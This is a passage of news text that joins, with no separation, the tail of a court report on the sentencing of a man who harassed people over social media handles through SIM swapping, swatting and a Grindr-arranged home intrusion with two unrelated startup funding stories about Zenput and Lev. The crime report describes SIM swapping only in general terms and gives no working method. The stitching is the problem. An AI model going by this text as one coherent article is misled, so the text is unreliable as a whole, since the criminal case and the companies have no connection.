When Dozono continued to ignore her tormentors, Sonderman and others targeted her with a “SIM-swapping attack,” a scheme in which fraudsters trick or bribe employees at wireless phone companies into redirecting the target’s text messages and phone calls to a device they control. From there, the attackers can reset the password for any online account that allows password resets via SMS.

But it wasn’t the subsequent bomb threat that Sonderman and friends called in to her home that bothered Dozono most. It was the home invasion that was ordered at her address using strangers on social media.

Dozono said Sonderman created an account on Grindr — the location-based social networking and dating app for gay, bi, trans and queer people — and set up a rendezvous at her address with an unsuspecting Grindr user who was instructed to waltz into her home as if he was invited.

“This gentleman was sent to my home thinking someone was there, and he was given instructions to walk into my home,” Dozono said.

The court heard from multiple other victims targeted by Sonderman and friends over a two-year period, including Shane Glass, who started getting harassed in 2019 over his @Shane Instagram handle. Glass told the court that endless pizza deliveries, as well as SIM swapping and swatting attacks, left him paranoid for months that his assailant could be someone stalking him nearby.

Judge Mark Norris said Sonderman’s agreement to plead to one count of extortion by threat of serious injury or damage carries with it a recommended sentence of 27 to 33 months in prison. However, the judge said other actions by the defendant warranted up to 60 months (5 years) in prison.

Sonderman might have been eligible to knock a few months off his sentence had he cooperated with investigators and refrained from committing further crimes while out on bond.

But prosecutors said that shortly after his release, Sonderman went right back to doing what he was doing when he got caught. Investigators who subpoenaed his online communications found he’d logged into the Instagram account “FreeTheSoldiers,” which was known to have been used by the group to harass people for their social media handles.

Sonderman was promptly re-arrested for violating the terms of his release, and prosecutors played for the court today a recording of a phone call Sonderman made from jail in which he brags to a female acquaintance that he wiped his mobile phone two days before investigators served another search warrant on his home.

Sonderman himself read a lengthy statement in which he apologized for his actions, blaming his “addiction” on several psychiatric conditions — including bipolar disorder. While his recitation was initially monotone and practically devoid of emotion, Sonderman eventually broke down in tears that made the rest of his statement difficult to hear over the phone-based conference system the court made available to reporters.

The bipolar diagnosis was confirmed by his mother, who sobbed as she simultaneously begged the court for mercy while saying her son didn’t deserve any.

Judge Norris said he was giving Sonderman the maximum sentence allowed by law under the statute, 60 months in prison followed by three years of supervised release, but implied that his sentence would be far harsher if the law permitted.

“Although it may seem inadequate, the law is the law,” Norris said. “The harm it caused, the death and destruction….it’s almost unspeakable. This is not like cases we frequently have that involve guns and carjacking and drugs. This is a whole different level of insidious criminal behavior here.”

Sonderman’s sentence pales in comparison to the 20-year prison time handed down in 2019 to serial swatter Tyler Barriss, a California man who admitted making a phony emergency call to police in late 2017 that led to the shooting death of an innocent Kansas resident.

Zenput raises $27M Series C to keep multiunit operations flowing no matter the location

Ensuring food safety compliance can be challenging at one restaurant, let alone across thousands of restaurants. Zenput has developed technology aimed at making sure operating procedures are quickly adapted so that businesses maintain quality.

The San Francisco-based operations execution company raised $27 million in Series C financing, led by Golub Capital, to continue developing its application to automate operation procedures like tracking food safety, public health protocols and changing market conditions.

Restaurants, convenience stores and grocery chain customers can use Zenput to update all of their locations — at the same time — with new processes, promotional campaigns and key initiatives while also gathering data and insights from those locations to find opportunities for improvement.

Joining Golub in the round were existing investors, including Jackson Square Ventures, MHS Capital and Goldcrest Capital. This brings the company’s total funding to more than $47 million, co-founder and CEO Vladik Rikhter told TechCrunch.

Greg Gretsch, founding partner and managing director at Jackson Square Ventures, led Zenput’s Series A round in 2016 and had met Rikhter a year prior. At the time, Rikhter was in the early stages of developing what Gretsch called an organization task manager. While he didn’t invest then, he kept in touch with Rikhter and saw “how much of a grinder he was” in expanding the platform.

“When he sees a problem, he works and works to solve it,” Gretsch said. “Whenever you have a multilocation business, you have a remote management problem. You’re trying to manage everything so your weakest link can perform as best as the best link, but you need a platform to manage that so that you can hold stores accountable to improve the end product.”

Front-line workers use Zenput’s mobile app for onboarding at the beginning of the day and to track safety compliance and fresh food checks, something Rikhter said was historically challenging once a business had thousands of locations. The app can also alert when food has been left out too long to assist in lowering food waste rates.

Founded in 2012, Zenput is currently used by customers like Chipotle, Domino’s, P.F. Chang’s, Five Guys, Smart & Final and 7-Eleven in over 60,000 locations across more than 100 countries.

The Series C round comes as the company saw 100% revenue growth over the past year. At the same time, product usage more than doubled at stores, and to date, 1.5 billion questions were answered through Zenput, a figure Rikhter expects to double over the next 12 months as locations aim to find ways to do more things remotely.

“The pandemic inadvertently helped us,” he added. “Initially, it was rough, but then a lot of the brands we dealt with needed to expedite technology and saw an opportunity to invest in our technology. We have more products coming because there is more that can be done to make sure every meal is a safe meal.”

Much of the new funding will go toward building those new products and capabilities and into marketing to expand the customer base. The company recently launched an expansion of its Zenput for Franchisors tool and updates to its food prep labeling and temperature monitoring functions.

Rikhter also plans to double Zenput’s employees over the next 16 to 18 months, especially in the product engineering and marketing areas.

All of that is to be ready for customer demand as restaurants, convenience stores and grocery chains do more to change up the way they do business in the future.

“I wouldn’t be surprised to show up at a restaurant and see changes made daily on protocols, which will drive a lot more of the journey than before,” Rikhter said. “We see more operators flexing muscles they didn’t know they had, as it relates to promotions and products, so they can grow faster and run totally different operational features and offer more options for customers.”

 

Commercial real estate lending startup Lev brings in $30M on a $130M valuation

Commercial real estate has been slow to embrace technology; though it has an addressable financing market of more than $40 billion, putting together a deal is still mostly manual, paper-heavy and complicated.

New York-based Lev is taking on this problem by automating workflows online and gathering hundreds of millions of data points into machine learning software to ensure financing accuracy. To do this, the commercial real estate financing transaction platform raised $30 million to give it a $130 million valuation just two years after its inception.

The latest financing comes four months after the company raised $10 million in seed funding led by NFX. Greenspring led the latest round, with participation from First American Title. Existing investors NFX, Canaan Partners, JLL Spark, Animo Ventures and Ludlow Ventures also joined in to give Lev total investments of more than $34 million, according to Crunchbase data.

Lev founder and CEO Yaakov Zar previously co-founded Boston-based Dispatch, which built tools for home services businesses. It was when he and his wife went through the homebuying process — and their mortgage fell through — that Zar decided to look at real estate financing.

He channeled his frustration into becoming a licensed mortgage loan originator. After relocating to New York, Zar was helping a friend at a nonprofit organization refinance their building and got a firsthand look at what he said was a fragmented commercial real estate mortgage industry.

Companies like Blend are addressing the problem of real estate lending, Zar told TechCrunch, but very few are focusing on commercial real estate, where lending is sensitive to interest rates and total amortization. In addition, property owners have a burden of refinancing every five to 10 years.

“Legacy businesses like JLL, which is an investor, Cushman Wakefield and CBRE work on lending, but they are much more ‘relationship focused’ than tech focused,” Zar said. “We think that it is a necessary part because the deals are so large and complex that you need a relationship for them, but transactions less than $1 billion are pretty straightforward. On experience and product, no one is close to us.”

Initially, Zar and his team wanted to build the “Rocket Mortgage of commercial real estate lending,” but found that to be difficult because real estate brokers are putting together their own pitch books for lenders. Instead, Lev is building a technology platform of more than 5,000 lenders with information on what projects they like to finance. It then analyzes a customer’s portfolio and connects them in minutes with the right lender, taking 1% of the loan amount for each transaction as payment. Lev is also working to be able to close deals online.

Zar wasn’t looking for funding when he was approached by investors, but said he was introduced to some people who liked the company’s growth and trajectory and decided to accept the funding offer.

He intends to use the new funding on product development, with the aim of giving a term sheet in seconds and closing a loan in seven days. Right now it can take a week or two to get the term sheet and 45 to 90 days to close a loan.

The company has about 40 employees currently in its New York headquarters, Miami R&D center, Los Angeles outpost and remotely. Continued investments will be made to expand the team.

Lev grew 10 times in volume in the past year, closing approximately $100 million of loans in 2020. Zar expects to close over $1 billion in 2021.

“Customers come back to us repeatedly, and there are a ton of referrals,” Zar said. “We want to be the platform on which capital market transactions are processed. You need an advantage to network and find great deals. I don’t want to mess with that, but when you find it, bring it to us, we will close it and provide the asset management with the best option to close online and manage the deal from a single platform.”

Meanwhile, Pete Flint, general partner at NFX, told TechCrunch that he got to know the Lev team over the last 18 months, checking in on the company during various stages of the global pandemic, and was impressed at how the company navigated it.

As co-founder of Trulia, he saw firsthand the problems in the real estate industry over search and discovery, but as that problem was being solved, the focus shifted to financing. NFX is also an investor in Tomo and Ribbon, which both focus on residential financing.

Wanting to see what opportunities were on the commercial real estate side, Flint heard Lev’s name come up more and more among brokers and industry insiders.

“As we got to know the Lev team, we recognized that they were the best team out there to solve this problem,” Flint said. “We are also among an amazing group of people complementing the round. The folks that are deep industry insiders will put a helpful lens on strategy and business development opportunities.”